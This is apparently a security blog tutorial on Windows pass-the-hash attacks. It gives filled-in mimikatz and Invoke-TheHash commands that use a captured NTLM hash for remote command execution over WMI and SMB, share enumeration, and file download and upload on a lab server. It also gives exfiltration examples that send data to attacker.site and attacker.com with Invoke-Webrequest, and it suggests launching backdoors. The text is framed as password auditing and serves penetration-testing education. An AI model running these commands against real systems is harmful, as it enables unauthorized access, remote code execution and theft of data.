Pass-the-hash attack (how to use NTLM without cracking a password)

This is the second part, devoted to auditing Windows security and assessing the strength of user passwords. It is recommended that you begin the acquaintance with the first part, which is called “How to hack a Windows password”.

How to use NTLM hash without password cracking: Pass-the-hash attack

Pass-the-hash attack allows ones to use the hash directly, without brute-force.

mimikatz can perform the well-known operation 'Pass-The-Hash' to start as other user with an NTLM hash of the user password instead of its real password. To do this, the program starts the process with fake authentication, then replaces the fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).

To perform this attack, mimikatz, which can execute commands from another user, first needs to give the process debug privileges:

privilege::debug
token::whoami
token::elevate

Then you need to run a command of the form:

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

Instead of DOMAIN, you need to specify a fully qualified domain name or the name of the workgroup, if performed for a local user. The /run:COMMAND option can be skipped and then cmd.exe will be executed (a command prompt will open).

Example:

sekurlsa::pth /user:Alexey /domain:workgroup /ntlm:ca76a176340f0291e1cc8ea7277fc571 /run:taskmgr

But it seems that this is not working (maybe I'm doing something wrong).

But the Invoke-TheHash program certainly works, it uses the NTLM hash to execute commands on remote systems, as well as collect information and work with files in network folders. That is, for all these actions, it is not necessary to decrypt the password from the NTLM hash.

Invoke-TheHash includes the following features:

  • Invoke-WMIExec (running commands through WMI)
  • Invoke-SMBExec (executing commands through SMB (PsExec))
  • Invoke-SMBEnum (enumerates users, groups, network sessions, and shared resources)
  • Invoke-SMBClient (SMB Client)
  • Invoke-TheHash (to run Invoke-TheHash functions against multiple targets)

How to install and run Invoke-TheHash on Windows

Invoke-TheHash scripts are written in PowerShell, so it is highly recommended that you read the article “How to set up the PowerShell environment on Windows and Linux” in which you will find answers to many questions about using PowerShell, as well as an example of fixing a bug in the Invoke-TheHash script when it starts on Linux.

Download script files: https://github.com/Kevin-Robertson/Invoke-TheHash/archive/master.zip

Go to the script directory (you may have a different path):

cd C:\Users\MiAl\Downloads\Invoke-TheHash-master\

To start, import the functions:

Import-Module ./Invoke-TheHash.psd1

And use these functions to run:

Invoke-WMIExec
Invoke-SMBExec
Invoke-SMBEnum
Invoke-SMBClient
Invoke-TheHash

As the target computer, we will use Windows Server 2019, computer name is HACKWARE-SERVER, computer IP is 192.168.0.53. When you launch an attack from Windows, you can use the computer name or IP, and when you launch an attack from Linux, the computer name is unlikely to be resolved to IP, so it’s better to specify the IP address.

The NTLM hash is extracted for this computer:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

On Windows Server, it is impossible to create an Administrator account without a password or with a weak password and therefore we can assume that it was not possible to crack the NTLM hash. Let’s consider options for how we can use it anyway.

NTLM hash and command execution via WMI

Windows Management Instrumentation (WMI) is one of the core technologies for centralized management and monitoring of various parts of the computer infrastructure running the Windows platform.

Without going into the details of WMI, this technology is used to control Windows computers over the network and, among other things, allows ones to execute commands on remote computers. The disadvantage of a practical attack on WMI is that by default on regular Windows workstations, WMI technology is disabled and/or access is closed by a firewall. But on Windows Server, WMI technology is available.

To make sure WMI is available on a remote computer, you need to run a command of the form:

Get-WmiObject -Namespace "root\cimv2" -Class Win32_LogicalDisk -ComputerName COMPUTERNAME_OR_IP -Credential COMPUTERNAME\USERNAME

For example, I want to check if WMI is available for the Администратор user on a computer named HACKWARE-SERVER:

Get-WmiObject -Namespace "root\cimv2" -Class Win32_LogicalDisk -ComputerName HACKWARE-SERVER -Credential HACKWARE-SERVER\Администратор

You will see the authentication request window on the remote system:

And if everything is fine (the password is correct and WMI is supported), then you will see information about the file system on the remote computer:

If you really do not have a password, then go straight to Invoke-WMIExec.

You need to run a command of the form:

Invoke-WMIExec -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -Command "COMMAND" -verbose

Where:

  • -Target is hostname or IP address of the target.
  • -Username is username to use in authentication.
  • -Domain is domain on which a computer works. This parameter is not needed with local accounts or when @domain is used after the username.
  • -Hash is NTLM password hash for authentication. This function will accept both LM:NTLM and NTLM format.
  • -Command is command to execute on the target. If no command is specified, the function will check if the user and hash have access to WMI on the target system.
  • -Sleep sets the value of the Start-Sleep function in milliseconds. Default=10 milliseconds

My real command:

Invoke-WMIExec -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Command "powershell.exe ls C:\ > c:\file.txt" -verbose

In this example, the command was executed on the remote system:

powershell.exe ls C:\ > c:\file.txt

That is, in PowerShell I ran

ls C:\ > c:\file.txt

Where

  • ls C:\ means show a list of the root file of the C: drive
  • > means the result is redirected to a file
  • c:\file.txt is the file where the output of the ls command is redirected

That is, as a result, the c:\file.txt file should be created on the remote system, let’s check:

According to the described technology, you can run a backdoor or any other file or command.

Using the PowerShell Invoke-Webrequest command, you can transfer files from the attacked machine to another:

Invoke-Webrequest https://attacker.site/?base64=STRING
Invoke-Webrequest attacker.com/i.php -method POST -infile file.zip

How to execute commands through PsExec

In general, everything is very similar to the Invoke-WMIExec function:

Invoke-SMBExec -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -Command "COMMAND" -verbose

In my tests, I was not able to redirect the output from SMBExec to a file, but the function works, for example, I executed the following command:

Invoke-SMBExec -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Command "powershell.exe Invoke-Webrequest 192.168.0.89" -verbose

The payload in it is:

powershell.exe Invoke-Webrequest 192.168.0.89

A request was made to the web server to the logs of which I have access, and there I saw a corresponding line confirming that a request was made to the web server from the attacked machine:

192.168.0.53 - - [04/Feb/2020:17:19:07 +0300] "GET / HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.17763.771"

How to retrieve remote system information via SMB

Invoke-SMBEnum enumerates users, groups, network sessions, and shared resources (printers and network folders) by SMB2.1 with or without SMB login.

Usage:

Invoke-SMBEnum -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -verbose

All options are already familiar, but there is no option with the command. Instead, there is a new option with an action:

  • -Action - (possible variants: All, Group, NetSession, Share, User) Default = Share: This option sets which enumeration action to perform.

An example of a real command:

Invoke-SMBEnum -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action All -verbose

The command worked, but something was wrong with the encoding:

SMB client with NTLM hash support

SMB client allows you to download and upload files to a network folder. There are many SMB clients, the uniqueness of Invoke-SMBClient in using the NTLM hash instead of the password:

Invoke-SMBClient -Domain DOMAIN -Username USERNAME -Hash HASH -Action ACTCION -Source \\SERVER\FOLDER -Destination ФАЙЛ -verbose

The action may be as follows:

  • -Action - Default = List: (possible variants: List, Recurse, Delete, Get, Put) The action to execute.
  • List: List the contents of the directory.
  • Recurse: Lists the contents of the directory and all subdirectories.
  • Delete: Deletes the file.
  • Get: Loads a file.
  • Put: Uploads a file and sets the timestamp for creation, access and last record to match the original file.

Depending on the selected action, the Source may be the following:

  • -Source
  • List and Recurse: UNC directory path.
  • Delete: UNC file path.
  • Get: UNC file path.
  • Put: File to upload. If the full path is not specified, then the file should be in the current directory. When the 'Modify' switch is used, 'Source' must be an array of bytes.

Depending on the selected action, the new file on the local system (Destination) may be the following:

  • -Destination
  • List and Recurse: Not used.
  • Delete: Not used.
  • Get: If used, the value will be the new name of the downloaded file. If the full path is not specified, then the file will be created in the current directory.
  • Put: UNC path for the uploaded file. The file name must be specified.

Let’s consider examples of the most common actions.

View the contents of the network folder named Share-Server on the computer \\HACKWARE-SERVER:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action List -Source \\HACKWARE-SERVER\Share-Server -verbose

Download the changelog.txt file from the Share-Server folder from the computer \\HACKWARE-SERVER and save it in the current working directory of the local computer with the name changelog_server.txt:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action Get -Source \\HACKWARE-SERVER\Share-Server\changelog.txt -Destination changelog_server.txt -verbose

Upload the Invoke-TheHash.ps1 file located on the local computer in the C:\Users\MiAl\Downloads\Invoke-TheHash-master\ directory to the \\HACKWARE-SERVER computer in the Share-Server folder with the name Script.ps1:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action Put -Source C:\Users\MiAl\Downloads\Invoke-TheHash-master\Invoke-TheHash.ps1 -Destination \\HACKWARE-SERVER\Share-Server\Script.ps1 -verbose

Invoke-thehash

Invoke-TheHash is a function for invoking Invoke-TheHash functions against multiple targets.

See the documentation for more details and examples: https://github.com/Kevin-Robertson/Invoke-TheHash

Conclusion

So, in this and the previous article we learned:

  • about the existence of an NTLM hash,
  • about where the Windows user password is stored
  • that if you have an online Microsoft account, the password hash is still stored on the local computer
  • how to crack windows user password
  • how to use NTLM hash without brute-force

Last Updated on

Recommended for you:

Leave a Reply

Your email address will not be published.